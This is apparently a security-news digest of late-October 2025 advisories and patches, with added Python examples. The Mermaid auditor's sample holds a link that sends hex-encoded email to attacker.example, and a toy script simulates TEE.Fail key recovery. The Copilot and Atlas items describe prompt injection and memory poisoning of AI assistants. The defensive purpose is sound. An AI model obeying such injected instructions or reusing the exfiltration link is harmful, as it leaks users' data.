All news in category "Security Advisory and Patch Watch"
Thu, October 30, 2025
CISA Releases Two ICS Advisories on ISO 15118-2 and TropOS
🛡️ CISA released two Industrial Control Systems advisories addressing the International Standards Organization ISO 15118-2 standard and Hitachi Energy TropOS. The advisories provide timely information on security issues, vulnerabilities, and potential exploits affecting ICS components. Administrators and operators are urged to review the advisories for technical details and recommended mitigations to protect operational environments.
Thu, October 30, 2025
ISO 15118-2 SLAC Vulnerability in EV Charging Protocol
🔒 ISO 15118-2-compliant EV charging implementations using the SLAC (Signal Level Attenuation Characterization) protocol are vulnerable to spoofed attenuation measurements that can let a rogue device insert itself as a man-in-the-middle between vehicle and charger, tracked as CVE-2025-12357 (CVSS v4 7.2). The issue is an improper restriction of the communication channel to its intended endpoints (CWE-923) and may be exploitable wirelessly at close range via electromagnetic induction, so no physical tap on the charging cable is needed. ISO recommends TLS with certificate chaining, which ISO 15118-20 makes mandatory; CISA advises minimizing network exposure, isolating control networks, and using secure remote access methods.
Thu, October 30, 2025
Hitachi Energy TropOS Command Injection and Privilege Issues
⚠️ Hitachi Energy's TropOS wireless devices contain multiple vulnerabilities — including OS command injection and improper privilege management — that can be exploited remotely by authenticated users to obtain root access. Affected 4th Gen firmware versions up to 8.9.6.0 are vulnerable (CVE-2025-1036, CVE-2025-1037, CVE-2025-1038); CVSS v4 scores reach 8.7. Hitachi Energy advises immediate update to version 8.9.7.0, and CISA recommends isolating devices, minimizing network exposure, and following ICS security best practices.
Wed, October 29, 2025
Plugin Flaw Lets Subscribers Read Any Server File
⚠️ The Anti-Malware Security and Brute-Force Firewall WordPress plugin (versions up to 4.23.81) contains a vulnerability (CVE-2025-11705) that allows authenticated users with Subscriber or higher privileges to read arbitrary files on the server. The cause is a missing capability check in the GOTMLS_ajax_scan() AJAX handler: the handler verifies a nonce, but a nonce only proves the request was not forged cross-site and says nothing about whether the user is allowed to run a scan, so any logged-in user who can obtain the nonce can request sensitive files such as wp-config.php. The developer released v4.23.83 on October 15, which adds a proper capability check via a new GOTMLS_kill_invalid_user() function; administrators of membership sites and any site with open registration should update immediately.
Wed, October 29, 2025
Microsoft fixes Media Creation Tool on affected PCs again
🛠 Microsoft has restored the Windows 11 Media Creation Tool after reports it failed to run on some up-to-date Windows 10 22H2, Windows 11 25H2 and Arm64 systems following the Windows 11 2025 Update. Microsoft says the issue was resolved in the optional KB5067036 preview update published October 28, 2025, and the updated tool is now available for download. As before, users can also obtain Windows ISO files directly to create bootable media.
Wed, October 29, 2025
Microsoft fixes 0x800F081F Windows Update failures
🔧 Microsoft has resolved a known issue that caused Windows updates to fail with error code 0x800F081F on Windows 11 24H2 devices. The problem affected systems that installed the KB5050094 January 2025 preview cumulative update and subsequent updates, and Microsoft traced the failures to missing language packs and feature payloads removed by ACR/MCR cleanup. Microsoft acknowledged the issue on October 15 and fixed it in the KB5067036 October 2025 preview update. Administrators who cannot install the optional preview immediately can perform an In‑Place Upgrade via Windows installation media or the Settings > System > Recovery workflow to restore missing components without losing files or apps.
Wed, October 29, 2025
BSI: Tens of Thousands of German Exchange Servers Vulnerable
⚠️ The German Federal Office for Information Security (BSI) warns that the majority of an estimated 33,000 publicly reachable Microsoft Exchange Server 2016 and 2019 installations still operate without vendor support after 14 October 2025. Without security updates, new critical Exchange vulnerabilities cannot be patched and affected systems may need to be taken offline to avoid compromise. The BSI highlights rapid network-wide compromise and ransomware risk and urges prompt upgrades, migrations, or protective measures such as VPNs or IP restrictions.
Wed, October 29, 2025
Defending QUIC Against Acknowledgement-Based DDoS Attacks
🔒 Cloudflare patched two QUIC ACK-handling vulnerabilities (CVE-2025-4820, CVE-2025-4821) affecting its open-source quiche library and the services built on it. The first was missing validation of ACK ranges, so a peer could acknowledge packet numbers the server had never sent; the second was susceptibility to Optimistic ACK, in which a peer acknowledges packets before they have arrived. Either lets a malicious peer convince the congestion controller that the path is faster than it really is, inflating the server's send rate and turning it into a CPU and bandwidth amplifier. Cloudflare's fix enforces ACK ranges against packets actually sent and deliberately skips packet numbers at a dynamic, CWND-aware frequency, so that an acknowledgement of a skipped number exposes the lying peer; quiche versions prior to 0.24.4 were affected.
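The two checks described above, as an added example modelled on the sender side of a QUIC connection (this is not quiche or Cloudflare code). The model is deliberately simplified: packet numbers only, no ACK delay, ECN or loss recovery, and a fixed skip frequency where quiche scales it with the congestion window. An ACK frame is represented as a list of inclusive (lo, hi) ranges, i.e. the Largest Acknowledged plus the gap/length pairs already decoded.

```python
"""Sender-side ACK validation: reject unsent ranges and detect Optimistic ACK.

Added example, not code from quiche or Cloudflare. Names and the skip
frequency are assumptions made for the example.
"""
from dataclasses import dataclass, field
import random


@dataclass
class AckValidator:
    # Hypothetical fixed skip frequency; quiche adapts this to the CWND so
    # a larger window is probed more often.
    skip_every: int = 8
    next_pn: int = 0
    largest_sent: int = -1
    skipped: set = field(default_factory=set)

    def next_packet_number(self) -> int:
        """Allocate a packet number, leaving a hole every `skip_every`
        numbers. A peer that acknowledges the hole has acknowledged a
        packet that never existed."""
        if self.next_pn and self.next_pn % self.skip_every == 0:
            self.skipped.add(self.next_pn)
            self.next_pn += 1
        pn = self.next_pn
        self.next_pn += 1
        self.largest_sent = pn
        return pn

    def validate_ack(self, ranges):
        """Return (ok, reason) for an ACK frame.

        Rejects malformed ranges, ranges above the largest packet number
        actually sent (the missing range validation), and any range that
        covers a skipped number (the Optimistic ACK detection)."""
        for lo, hi in ranges:
            if lo < 0 or lo > hi:
                return False, f"malformed range {lo}-{hi}"
            if hi > self.largest_sent:
                return False, f"acknowledges unsent packet number {hi}"
            hit = [pn for pn in self.skipped if lo <= pn <= hi]
            if hit:
                return False, f"acknowledges skipped packet number {hit[0]}"
        return True, "ok"


def to_ranges(pns):
    """Collapse a sorted list of packet numbers into inclusive ranges."""
    ranges = []
    for pn in pns:
        if ranges and ranges[-1][1] + 1 == pn:
            ranges[-1][1] = pn
        else:
            ranges.append([pn, pn])
    return [tuple(r) for r in ranges]


def simulate(peer: str, n_packets: int = 40, seed: int = 1):
    """Send n_packets and validate the ACK a given kind of peer returns.

    'honest'     acks a random subset of the numbers actually sent
    'future'     acks past the largest number sent (CVE-2025-4820 shape)
    'optimistic' acks everything up to the largest sent, holes included
    """
    rng = random.Random(seed)
    v = AckValidator()
    sent = [v.next_packet_number() for _ in range(n_packets)]
    if peer == "honest":
        received = sorted(rng.sample(sent, k=len(sent) * 3 // 4))
        ranges = to_ranges(received)
    elif peer == "future":
        ranges = [(0, v.largest_sent + 5)]
    elif peer == "optimistic":
        ranges = [(0, v.largest_sent)]
    else:
        raise ValueError(peer)
    return v.validate_ack(ranges)


if __name__ == "__main__":
    for kind in ("honest", "future", "optimistic"):
        print(kind, simulate(kind))
```

The honest peer passes because it can only ever acknowledge numbers it saw on the wire, which by construction excludes the holes; the optimistic peer is caught the moment its blanket range covers one. In a real stack the reaction to either failure is to close the connection with a protocol violation rather than to feed the frame to the congestion controller.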
Wed, October 29, 2025
Active Exploits Target DELMIA Apriso and XWiki — CISA
⚠️ CISA and researchers report active exploitation of critical vulnerabilities in Dassault Systèmes DELMIA Apriso and XWiki, including code injection, missing authorization, and eval injection flaws. Dassault addressed CVE-2025-6204 and CVE-2025-6205 for 2020–2025 releases in August and these issues were added to CISA’s Known Exploited Vulnerabilities catalog. The XWiki flaw (CVE-2025-24893) is being abused in a two-stage chain that stages and later executes a downloader to deliver a cryptocurrency miner. Organizations should apply vendor updates immediately and meet federal remediation deadlines where applicable.
Tue, October 28, 2025
Windows 11 KB5067036 Preview Adds Administrator Protection
🔒 Microsoft has released the KB5067036 preview cumulative update for Windows 11 24H2 and 25H2, introducing the new Administrator Protection feature alongside a refreshed Start menu. Administrator Protection requires users to verify identity with Windows Hello before permitting actions that require administrative privileges; it is off by default and can be enabled via OMA-URI in Microsoft Intune or Group Policy. The preview also delivers File Explorer and UI enhancements plus a range of bug fixes across authentication, graphics, accessibility and Windows Update reliability. Microsoft reports no known issues with this update.
Tue, October 28, 2025
TEE.Fail: DDR5 physical interposition exposes CPU TEE keys
🔓 A team of researchers from Georgia Tech, Purdue University and security firm Synkhronix disclosed TEE.Fail, a side‑channel that inspects DDR5 memory traffic to extract secrets from processor TEEs. Using an inexpensive interposition device built from off‑the‑shelf parts for under $1,000, the technique can recover attestation and signing keys from Intel SGX/TDX and AMD SEV‑SNP with Ciphertext Hiding, and can be used to undermine GPU confidential computing. Vendors assert that physical bus attacks remain out of scope.
Tue, October 28, 2025
CISA Warns of Two Actively Exploited DELMIA Flaws
⚠️ CISA has confirmed active exploitation of two vulnerabilities in Dassault Systèmes' DELMIA Apriso: CVE-2025-6205 (critical missing authorization) and CVE-2025-6204 (high-severity code injection). Both flaws were patched by the vendor in early August 2025 and affect Releases 2020 through 2025. Federal agencies must remediate within three weeks under BOD 22-01, and CISA urges all organizations to prioritize vendor mitigations or discontinue use if no fixes exist.
Tue, October 28, 2025
TEE.Fail breaks confidential computing on DDR5 CPUs
🔓 Academic researchers disclosed TEE.Fail, a DDR5 memory-bus interposition side-channel that can extract secrets from Trusted Execution Environments such as Intel SGX, Intel TDX, and AMD SEV-SNP. By inserting an inexpensive interposer between a DDR5 DIMM and the motherboard and recording command/address and data bursts, attackers can map deterministic AES-XTS ciphertexts to plaintext values and recover signing and cryptographic keys. The method requires physical access and kernel privileges but can be implemented for under $1,000; Intel, AMD and NVIDIA were notified and are developing mitigations.
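The ciphertext-to-plaintext mapping mentioned in both TEE.Fail items above, as an added example that is not the researchers' code and does not model any vendor's engine. AES-XTS is replaced by a keyed stand-in (HMAC-SHA256 over tweak || block, truncated to 16 bytes) so the block runs without third-party libraries; the property exercised is the one XTS shares with the stand-in when used for memory encryption: the same key, physical address (tweak) and plaintext always produce the same ciphertext, and nothing changes between writes. The example assumes the attacker can get known plaintexts encrypted at a physical address of its choosing, which is what the page's "kernel privileges" requirement is taken to provide here.

```python
"""Equality leakage from deterministic, address-tweaked memory encryption.

Added example, not TEE.Fail code. The cipher is a stand-in; the attack
structure (observe bus, build dictionary, match) is what is demonstrated.
"""
import hashlib
import hmac
import os

BLOCK = 16


class MemoryEncryptionEngine:
    """Stand-in for the CPU-side engine; the key never leaves it."""

    def __init__(self) -> None:
        self._key = os.urandom(32)

    def encrypt(self, phys_addr: int, plaintext: bytes) -> bytes:
        assert len(plaintext) == BLOCK
        tweak = phys_addr.to_bytes(8, "little")   # address-derived tweak, as in XTS
        return hmac.new(self._key, tweak + plaintext, hashlib.sha256).digest()[:BLOCK]


class BusObserver:
    """Interposer on the DIMM: sees (address, ciphertext) for every write,
    never the plaintext or the key."""

    def __init__(self) -> None:
        self.writes: list[tuple[int, bytes]] = []

    def record(self, addr: int, ct: bytes) -> None:
        self.writes.append((addr, ct))


def write_block(engine, observer, addr, plaintext):
    """A memory write as it appears on the bus."""
    ct = engine.encrypt(addr, plaintext)
    observer.record(addr, ct)
    return ct


def build_dictionary(engine, observer, addr, candidates):
    """Attacker phase (assumption: kernel privileges let the attacker cause
    known plaintexts to be written at `addr`): index observed ciphertexts
    by (address, ciphertext)."""
    table = {}
    for pt in candidates:
        ct = write_block(engine, observer, addr, pt)
        table[(addr, ct)] = pt
    return table


def recover(table, addr, ct):
    """Victim phase: look up a ciphertext seen at `addr`; None on a miss."""
    return table.get((addr, ct))


def demo():
    engine, observer = MemoryEncryptionEngine(), BusObserver()
    victim_addr = 0x7F00_0000
    # Victim keeps one secret byte at a known offset of a 16-byte block,
    # so the candidate space is only 256 plaintexts.
    candidates = [bytes([b]) + b"\x00" * (BLOCK - 1) for b in range(256)]
    table = build_dictionary(engine, observer, victim_addr, candidates)
    secret = bytes([0xA5]) + b"\x00" * (BLOCK - 1)
    seen = write_block(engine, observer, victim_addr, secret)   # victim's write
    hit = recover(table, victim_addr, seen)
    # The address tweak blocks cross-address matching: the same plaintext at
    # another address gives a different ciphertext and a dictionary miss.
    elsewhere = write_block(engine, observer, victim_addr + BLOCK, secret)
    miss = recover(table, victim_addr + BLOCK, elsewhere)
    return hit, miss


if __name__ == "__main__":
    hit, miss = demo()
    print("recovered:", hit.hex() if hit else None, "| other address:", miss)
```

The tweak only partitions the dictionary by address; it does not add freshness. Any scheme that makes the ciphertext depend on a per-write counter or that authenticates blocks with an integrity tree breaks the lookup, which is the design trade-off the disclosed attack targets.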
Tue, October 28, 2025
Chrome zero-day exploited in targeted Operation ForumTroll
🔒 A Chrome zero-day (CVE-2025-2783) was exploited in a targeted espionage campaign Kaspersky calls "Operation ForumTroll," attributed to the threat actor Mem3nt0 mori. Attackers used highly personalized phishing invitations and one-click, short-lived links to deliver a sandbox-escape exploit that gave the attacker code execution outside Chrome's renderer sandbox. Google shipped fixes in Chrome 134.0.6998.177/.178, and a related issue was later patched in Firefox as CVE-2025-2857.
Tue, October 28, 2025
Schneider Electric EcoStruxure OPC UA Server DoS Advisory
🔒 CISA and Schneider Electric describe a vulnerability (CVE-2024-10085) in EcoStruxure that allows remote actors to exhaust server resources and cause denial of service by sending a large number of OPC UA requests to the server. Affected products include EcoStruxure OPC UA Server Expert versions prior to SV2.01 SP3 and EcoStruxure Modicon Communication Server (all versions). The issue has a CVSS v4 base score of 8.2 and is noted as remotely exploitable with low attack complexity. Schneider has released SV2.01 SP3 to address the OPC UA Server Expert and plans remediation for Modicon; interim mitigations and hardening guidance are provided.
Tue, October 28, 2025
CISA Adds Two Dassault DELMIA Apriso Vulnerabilities
🔒 CISA added two vulnerabilities to its Known Exploited Vulnerabilities Catalog affecting Dassault Systèmes DELMIA Apriso. The issues—CVE-2025-6204 (code injection) and CVE-2025-6205 (missing authorization)—have evidence of active exploitation and pose significant risk. Under BOD 22-01, Federal Civilian Executive Branch agencies must remediate KEV-listed CVEs by the required due dates. CISA strongly urges all organizations to prioritize timely remediation as part of routine vulnerability management.
Tue, October 28, 2025
CISA Releases Three ICS Advisories on Schneider, Vertikal
🔔 CISA released three Industrial Control Systems (ICS) advisories addressing multiple vulnerabilities that may affect operational technology safety and availability. The advisories cover ICSA-25-301-01 Schneider Electric EcoStruxure, ICSMA-25-301-01 Vertikal Systems Hospital Manager Backend Services, and an update to ICSA-24-352-04 Schneider Electric Modicon (Update B). Administrators and asset owners should review the technical findings, assess exposure, and apply recommended mitigations promptly to reduce operational risk.
Tue, October 28, 2025
Vertikal Systems Hospital Manager Backend Services
⚠️ CISA disclosed two vulnerabilities in Vertikal Systems Hospital Manager Backend Services that were fixed as of September 19, 2025. The first exposed the ASP.NET tracing endpoint (/trace.axd) without authentication, disclosing request traces, headers, session identifiers, and internal paths. The second returned verbose ASP.NET error pages for invalid WebResource.axd requests, revealing framework versions, stack traces, and server paths. CVE-2025-54459 and CVE-2025-61959 were assigned; organizations should apply the vendor updates, confirm on any ASP.NET application that tracing is disabled (trace enabled="false" in web.config) and custom error pages are enabled (customErrors mode="On"), and follow network isolation best practices.
Tue, October 28, 2025
Copilot Mermaid Diagrams Could Exfiltrate Enterprise Emails
🔐 Microsoft has patched an indirect prompt injection vulnerability in Microsoft 365 Copilot that could have been exploited to exfiltrate recent enterprise emails via clickable Mermaid diagrams. Researcher Adam Logue demonstrated a multi-stage attack using Office documents containing hidden white-text instructions that caused Copilot to invoke an internal search-enterprise_emails tool. The assistant encoded retrieved emails into hex, embedded them in Mermaid output styled as a login button, and added an attacker-controlled hyperlink. Microsoft mitigated the risk by disabling interactive hyperlinks in Mermaid diagrams within Copilot chats.
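A check for the exfiltration shape described above, as an added example (not Microsoft's or the researcher's code): it scans Mermaid text returned by an assistant for `click` directives and flags links to hosts outside an allowlist or URLs carrying long hex-encoded runs. The allowlist, the sample diagram and the leaked text are constructed for the example.

```python
"""Audit clickable links in Mermaid output for hex-encoded exfiltration.

Added example. ALLOWED_HOSTS and SAMPLE are constructed, not real data.
"""
import re
from urllib.parse import urlsplit

# Mermaid `click <node> "<url>"` and `click <node> href "<url>"` forms.
CLICK_RE = re.compile(r'^\s*click\s+(\S+)\s+(?:href\s+)?"([^"]+)"', re.M)
# A run of at least 32 hex characters (16 bytes) is worth decoding.
HEX_RUN_RE = re.compile(r"(?:[0-9a-fA-F]{2}){16,}")

# Hypothetical: hosts an assistant in this tenant is allowed to link to.
ALLOWED_HOSTS = {"contoso.sharepoint.com"}


def find_click_links(mermaid: str) -> list[tuple[str, str]]:
    """Return (node, url) for every click directive in the diagram."""
    return [(m.group(1), m.group(2)) for m in CLICK_RE.finditer(mermaid)]


def hex_payloads(url: str) -> list[str]:
    """Decode every long hex run in the URL that turns out to be UTF-8."""
    decoded = []
    for run in HEX_RUN_RE.findall(url):
        try:
            decoded.append(bytes.fromhex(run).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def audit(mermaid: str) -> list[dict]:
    """Flag click links to non-allowlisted hosts or carrying hex payloads."""
    findings = []
    for node, url in find_click_links(mermaid):
        host = (urlsplit(url).hostname or "").lower()
        payloads = hex_payloads(url)
        if host not in ALLOWED_HOSTS or payloads:
            findings.append({"node": node, "host": host, "decoded": payloads})
    return findings


# Constructed sample of a poisoned response: a node styled as a button whose
# link smuggles hex-encoded mail content to an attacker-controlled host.
_LEAKED = "From: cfo@contoso.com\nSubject: Q3 numbers (draft)".encode().hex()
SAMPLE = f"""graph TD
    A[Sign in to continue]
    style A fill:#0078d4,color:#ffffff,stroke:#005a9e
    click A "https://attacker.example/collect?d={_LEAKED}" "Login"
    B[Help] --> C[Documentation]
    click C href "https://contoso.sharepoint.com/sites/docs"
"""


def demo() -> list[dict]:
    return audit(SAMPLE)


if __name__ == "__main__":
    for f in demo():
        print(f["node"], f["host"], f["decoded"])
```

Decoding is done only to surface what would have left the tenant; the actionable signal is the click directive itself, which is why Microsoft's mitigation of disabling interactive hyperlinks in Mermaid output removes the channel regardless of encoding.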
Tue, October 28, 2025
Atlas Browser Flaw Lets Attackers Poison ChatGPT Memory
⚠️ Researchers at LayerX Security disclosed a vulnerability in OpenAI’s Atlas browser that allows attackers to inject hidden instructions into a user’s ChatGPT memory via a CSRF-style flow. An attacker lures a logged-in user to a malicious page, leverages existing authentication, and taints the account-level memory so subsequent prompts can trigger malicious behavior. LayerX reported the issue to OpenAI and advised enterprises to restrict Atlas use and monitor AI-driven anomalies. Detection relies on behavioral indicators rather than traditional malware artifacts.